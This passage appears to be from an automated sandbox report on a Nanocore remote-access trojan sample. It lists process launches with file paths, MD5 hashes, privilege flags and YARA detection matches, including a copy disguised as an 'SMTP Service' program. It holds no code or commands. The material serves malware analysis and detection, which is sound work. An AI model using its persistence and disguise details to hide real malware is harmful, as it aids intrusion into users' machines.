              Commandline:taskeng.exe {6D7D75E4-8EFD-44BB-96AC-FEA7E6E0852F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Imagebase:0xffdd0000
              File size:464384 bytes
              MD5 hash:65EA57712340C09B1B0C427B4848AE05
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:11:56:56
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe 0
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:11:56:56
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 30%, ReversingLabs
              Reputation:low

              General

              Start time:11:57:02
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:11:57:05
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):false
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Start time:11:57:05
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:11:57:06
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):false
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Start time:11:57:06
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:11:57:07
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Disassembly

              Code Analysis
